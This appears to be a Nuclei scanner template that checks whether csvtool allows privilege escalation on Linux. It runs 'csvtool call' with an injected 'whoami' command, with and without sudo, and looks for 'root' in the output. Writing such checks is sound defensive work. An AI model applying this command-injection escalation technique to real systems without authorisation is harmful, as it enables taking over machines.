id: privesc-csvtool

info:
  name: csvtool - Privilege Escalation
  author: daffainfo
  severity: high
  description: |
    csvtool is a command-line utility in Unix-like operating systems that provides various tools for working with CSV (Comma-Separated Values) files. It can be used to manipulate, process, and analyze CSV data from the command line, making it a useful tool for tasks such as data extraction, transformation, and loading.
  reference:
    - https://gtfobins.github.io/gtfobins/csvtool/
  metadata:
    verified: true
    max-request: 3
  tags: code,linux,csvtool,privesc

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      whoami

  - engine:
      - sh
      - bash
    source: |
      csvtool call 'whoami;false' /etc/passwd

  - engine:
      - sh
      - bash
    source: |
      sudo csvtool call 'whoami;false' /etc/passwd

    matchers-condition: and
    matchers:
      - type: word
        part: code_1_response
        words:
          - "root"
        negative: true

      - type: dsl
        dsl:
          - 'contains(code_2_response, "root")'
          - 'contains(code_3_response, "root")'
        condition: or
# digest: 490a0046304402206972fa4e8362f0905cdf830d35c6efabc999e1a378b12d0911d08184930a4f3a02207b7b9c6434b0160d7aa6fb110485d3651aa80717333c1a79fb660d815dc9c30c:922c64590222798bb761d5b6d8e72950